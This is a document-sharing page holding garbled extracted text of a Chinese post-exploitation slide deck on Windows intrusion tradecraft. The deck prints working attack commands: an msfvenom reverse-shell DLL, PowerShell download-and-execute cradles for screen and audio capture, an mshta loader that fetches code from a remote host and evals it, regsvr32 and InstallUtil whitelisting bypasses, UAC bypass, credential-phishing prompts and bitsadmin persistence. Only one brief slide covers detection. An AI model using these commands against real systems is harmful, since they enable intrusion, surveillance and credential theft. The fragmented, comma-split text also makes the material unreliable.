20 元
下载资源

后渗透阶段的攻防对抗课件

上传人:2127513****773577... 文档编号:242008502 上传时间:2024-08-09 格式:PPT 页数:65 大小:20.91MB
返回 下载 相关 举报
后渗透阶段的攻防对抗课件_第1页
第1页 / 共65页
后渗透阶段的攻防对抗课件_第2页
第2页 / 共65页
后渗透阶段的攻防对抗课件_第3页
第3页 / 共65页
点击查看更多>>
资源描述
Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,2,#,1,2,12,Shell,is,Only,the,Beginning,后渗透,阶段的攻防对抗,3gstudent,&,Evi1cg,2,2,Shell is Only the Beginning后,As,a,offensive,researcher,if,you,can,dream,it,someone,has,likelyalready,done,it,and,that,someone,isnt,the,kind,of,person,who,speaks,at,security,cons,Matt,Graeber,3,2,As a offensive researcher,if,3gstudent,Good Study,Good Health,Good Attitude,4,2,3gstudentGood StudyGood Health,Evi1cg,Thin,WhiteHat,Security Researcher,5,2,Evi1cgThinWhiteHatSecurity Res,后渗透,阶段,渗透测试,以特定的,业务系统作为目标,识,别出关键的基础设施,并寻找客,户组织最具价值和尝试进行安全,保,护的信息和资产,黑客攻击,黑客,对攻击战果进一步扩大,以,及尽可能,隐藏自身痕迹的过程,6,2,后渗透阶段渗透测试黑客攻击62,打开一扇窗,Open,Proxy,绕过看门狗,我来作主人,Bypass,Application,Whitelisting,Escalate,Privileges,屋里有什么,Gather,Information,我来抓住你,Detection,and,Mitigations,挖一个密道,Persistence,目,录,7,2,打开一扇窗Open Proxy绕过看门狗我来作主,打开一扇窗,Open,Proxy,8,2,打开一扇窗82,为什么用代理?,更好地接触到目标所处环境,使用已有shell的机器作为跳板,扩大战果,Its,the,beginning,9,2,为什么用代理?更好地接触到目标所处环境 使用已,常用方法,端口转发:Client-,Lcx,Netsh;,HTTP-,Tunnel;,Metasploit-,Portpwd,HTTP-,ReGeorg;,Metasploit-,Socks4a,Socks代理:Client-,Ew,Xsocks;,其他:SSH,ICMP,等,Vpn,10,2,常用方法端口转发:Client-Lcx,Netsh,!,然而,我们可能会碰到这样的情况:,安装杀毒软件,拦截“恶意”程序,设置应用程序白名单,限制白名单以外的程序运行,eg:Windows,Applocker,11,2,!然而,我们可能会碰到这样的情况:安装杀毒软件,拦截,Windows,AppLocker,简介:,即“应用程序控制策略”,可用来对可执行程序、安装程序和脚本进行控制,开启默认规则后,除了默认路径可以执行外,其他路径均无法执行程序和脚本,12,2,Windows AppLocker简介:即“应用程序控制策略,绕过看门狗,Bypass,Application,Whitelisting,13,2,绕过看门狗Bypass Application Whitel,绕过思路,Hta,Office,Macro,Cpl,Chm,Powershell,Rundll32,Regsvr32,Regsvcs,Installutil,14,2,绕过思路 Hta Office Macro P,1,、,Hta,More:,Mshta.exe,vbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.cl,ose),Mshta.exe,javascript:.mshtml,RunHTMLApplication,;document.write();h=new%20ActiveXObject(WScript.Shell).run(calc.exe,0,true);tryh.Send();b=h.ResponseText;eval(b);catch(e)new%20ActiveX,Object(WScript.Shell).Run(cmd,/c,taskkill,/f,/im,mshta.exe,0,true);,15,2,1、HtaMore:Mshta.exevbscri,2,、,Office,Macro,MacroRaptor:,Detect,malicious,VBA,Macros,Python,https:/bitbucket.org/decalage/oletools/wiki/mraptor,16,2,2、Office MacroMacroRaptor:,3,、,Cpl,DLL/CPL:,生成,Payload.dll:,msfvenom,-p windows/meterpreter/reverse_tcp-B x00 xff lhost=192.168.127.132 lport=8888-f dll,-o payload.dll,(1),直接运行,dll,:,rundll32 shell32.dll,Control_RunDLL payload.dll,(2),将,dll,重命名,为,cpl,,双,击,运行,(3),普通的,dll,直接改后,缀名,From:,drops.wooyun.org/tips/16042,17,2,3、Cpl(1)直接运行dll:From:,4,、,Chm,高,级组合技打造,“,完美,”,捆,绑,后,门:,drops.wooyun.org/tips/14254,利用系,统,CHM,文件,实现隐蔽,后,门:,那些年我,们玩过的奇技淫巧,18,2,4、Chm高级组合技打造“完美”捆绑后门:利用系统CHM文,5,、,Powershell,Command:,powershell-nop,-exec Bypass-c IEX(New-OBjectet.WeBClient).DownloadString(ip:port/),Get-Content,payload,.ps1|iex,cmd.exe/K key.snk,$key=,BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZBp6qukLH0lLEq/vW979GWzVA,gSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhBdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkBix8MTgEt7hD1DC2hXv7dKaC5,31ZWqGXB54OnuvFBD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitoluf,o7Ucjh+WvZAU/dzrGny5stQtTmLxdhZBOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FBdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU,0wRvkWiZRerjmDdehJIBoWsx4V8aiWx8FPPngEmNz89tBAQ8zBIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHc,gJx6FpVK7qeEuvyV0OGKvNor9B/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3r,pZ9tBLZUefrFnLNiHfVjNi53Yg4=,$Content=System.Convert:FromBase64String($key),Set-Content key.snk,-Value$Content-Encoding Byte,编译:,C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe,/r:System.EnterpriseServices.dll,/target:liBrary/out:Regasm.dll,/keyfile:key.snk,Regasm.cs,运行:,C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe,Regasm.dll,OR,C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe,Regasm.dll,/,如果没有管理,员权限使用,/U,来运行,C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe,/U Regasm.dll,C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe,/U Regasm.dll,From:,https:/gist.githuB.com/suBTee/e1c54e1fdafc15674c9a,22,2,8、RegsvcsC:WindowsMicrosoft,9,、,Installutil,InstallUtil,:,编译:,C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe,/unsafe,/platform:x64/out:InstallUtil.exe,InstallUtil.cs,编译以后用,/U,参数运行:,C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe,/U,InstallUtil.exe,From:,suBt0 x10.Blogspot.jp/2015/08/application-whitelisting-Bypasses-101.html drops.wooyun.org/tips/8862,23,2,9、InstallutilFrom:suBt,10,、可,执行目录,通,过,ps,脚本,扫描可写入的,路径,脚本下,载地址:,go.mssec.se/AppLockerBC,From:,drops.wooyun.org/tips/11804,24,2,10、可执行目录通过ps脚本扫描可写入的路径,脚本下载地址:,11,、最直接的方式,提权,25,2,11、最直接的方式提权252,我来作主人,Escalate,Privileges,26,2,我来作主人Escalate Privileges262,常,见的提权,方式,本地提权漏洞,服务提权,协议,Phishing,27,2,常见的提权方式 本地提权漏洞 服务提权 协,本地提,权,根据,补丁号来确定是否存在漏洞的脚本:,https:/githuB.com/GDSSecurity/Windows-Exploit-Suggester,将受害者,计算机,systeminfo,导出到文件,:,Systeminfo,1.txt,使用脚本判断存在的漏洞:,python windows-exploit-suggester.py-dataBase 2016-05-31-mssB.xls-,systeminfo/Desktop/1.txt,28,2,本地提权根据补丁号来确定是否存在漏洞的脚本:https:/,可能遇到的,问题,Exp被杀!,将Exp改成Powershell:,evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html,29,2,可能遇到的问题Exp被杀!将Exp改成Powershell:,Demo,Time,30,2,Demo Time302,31,2,312,服,务提权,常用服务:,Mssql,,,Mysql,,,Oracle,,,Ftp,第三方服务:,Dll,劫持,文件劫持,提权脚本Powerup:,drops.wooyun.org/tips/11989,32,2,服务提权常用服务:Mssql,Mysql,Oracle,Ft,协议提权,利用已知的Windows中的问题,以获得本地权限提升,-,Potato,其利用NTLM中继(特别是基于HTTP,SMB中继)和NBNS欺骗进行提权。,详情:,tools.pwn.ren/2016/01/17/potato-windows.html,33,2,协议提权利用已知的Windows中的问题,以获得本地权限提升,Phishing,MSF,Ask模块:,exploit/windows/local/ask,通过runas方式来诱导用户通过点击uac验证来获取最高权限。,需要修改的msf脚本,metasploit/lib/msf/core/post/windows/runas.rb,34,2,PhishingMSF Ask模块:exploit/win,Phishing,Demo,35,2,Phishing Demo352,36,2,362,屋里有什么,Gather,Information,37,2,屋里有什么Gather Information372,Gather,Information,成为了主人,或许我们需要看看屋里里面有什么?,两种情况:,1:已经提权有了最高权限,为所欲为,2:未提权,用户还有UAC保护,还不能做所有的事情,38,2,Gather Information成为了主人,或许我们需要,Bypass,UAC,常用方法:,使用IFileOperation,COM接口,使用Wusa.exe的extract选项,远程注入SHELLCODE,到傀儡进程,DLL劫持,劫持系统的DLL文件,直接提权过UAC,Phishing,evi1cg.me/archives/Powershell_Bypass_UAC.html,UAC常用方法:使用IFileOperat,有了,权限,要做什么,搜集mstsc记录,浏览器历史记录,最近操作的文件,本机密码等,键盘记录,屏幕录像,Netripper,40,2,有了权限,要做什么搜集mstsc记录,浏览器历史记录,最近操,GetPass,Tips,通过脚本弹出认证窗口,让用户输入账号密码,由此得到用户的明文密,码。,powershell脚本如下:,From:Tips通过脚本弹出认证窗口,让用户输入账号,GetPass,Tips,MSF模块,post/windows/gather/phish_windows_credentials,42,2,GetPass TipsMSF模块post/windows/,更多参考,Installed,Programs,Startup,Items,Installed,Services,File/Printer,Shares,DatabaseServers,Certificate,Authority,Security,Services,Sensitive,Data,Key-logging,Screen,capture,Network,traffic,capture,User,Information,System,Configuration,Password,Policy,Security,Policies,Configured,Wireless,Networks,and,Keys,43,2,更多参考File/Printer Shares D,新的攻,击方法,无文件,44,2,新的攻击方法无文件442,无文件姿,势之(,一,)-Powershell,屏幕监控:,powershell,-nop,-exec,bypass,-c,“IEX,(New-Object,Net.WebClient).DownloadString(evi1cg.me/powershell/Show-TargetScreen.ps1);,Show-TargetScreen”,录音:,powershell,-nop,-exec,bypass,-c,“IEX,(New-Object,Net.WebClient).DownloadString(Backdoor,drops.wooyun.org/tips/11764,JavaScript Phishing,drops.wooyun.org/tips/12386,47,2,无文件姿势之(二)-jsJsRat:rundll32.ex,无文件姿,势之(,三,)-,mshta,启动JsRat:,Mshta,javascript:,.mshtml,RunHTMLApplication,;document.write();h=,new,%,20ActiveXObject,(,WinHttp,.WinHttpRequest.5.1,);h.,Open,(,GET,192.16,8.2.101:9998/connect,false,);,try,h.,Send,();b=h.,Res,ponseText,;,eval,(b);,catch,(e),new,%,20ActiveXObject,(,WScript.Shell,).,Run,(,cmd,/c,taskkill,/f,/im,mshta.exe,0,true,);,48,2,无文件姿势之(三)-mshta启动JsRat:Mshta,无文件姿,势之(,四,)-,sct,SCT:,regsvr32,/u,/s,Calc.sct,/i:http:,/urlto/calc.sct,scrobj.dll,From:,Use SCT to Bypass Application Whitelisting Protection,drops.wooyun.org/tips/15124,49,2,无文件姿势之(四)-sctregsvr32 /u,无文件姿,势之(,五,),-,wsc,Wsc:,rundll32.exe,javascript:,.mshtml,RunHTMLApplic,ation,Calc.wsc,;document.write();,GetObject,(,script,:urlto/calc.wsc,),From:,WSC,、,JSRAT and WMI Backdoor,drops.wooyun.org/tips/15575,50,2,无文件姿势之(五)-wscrundll32.exeCa,Demo,Time,51,2,Demo Time512,52,2,522,挖一个密道,Persistence,53,2,挖一个密道532,常,见方法,启动项,注册表,wmi,at,schtasks,利用已有的第三方服务,54,2,常见方法启动项schtasks利用已有的第三方服务54,新方法,Bitsadmin:,需要获得管理员权限,可开机自启动、间隔启动,适用于Win7,、Win8、Server,2008及以上操作系统,可绕过Autoruns对启动项的检测,已提交至MSRC(Microsoft,Security,Response,Center),55,2,新方法Bitsadmin:需要获得管理员权限,Demo,Time,56,2,Demo Time562,57,2,572,我来抓住你,Detection,and,Mitigations,58,2,我来抓住你Detection and Mitigations,Detection,and,Mitigations,bitsadmin,/list,/allusers,/verbose,Stop,Background,Intelligent,Transfer,Service,59,2,Detection and Mitigations,Detection,and,Mitigations,60,2,Detection and Mitigations602,关注,drops,61,2,关注drops612,Special,thanks,to,Casey,Smith,subTee,62,2,Special thanks toCasey Smith,Reference,1、Shell,is,Only,the,Beginning,quote,from,Carlos,Perezs,Blog,is Only th,Q&A,3,64,2,Q&A3642,65,2,652,
展开阅读全文
相关资源
正为您匹配相似的精品文档
相关搜索

最新文档


当前位置:首页 > 办公文档 > PPT模板库


copyright@ 2023-2025  zhuangpeitu.com 装配图网版权所有   联系电话:18123376007

备案号:ICP2024067431-1 川公网安备51140202000466号


本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。装配图网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知装配图网,我们立即给予删除!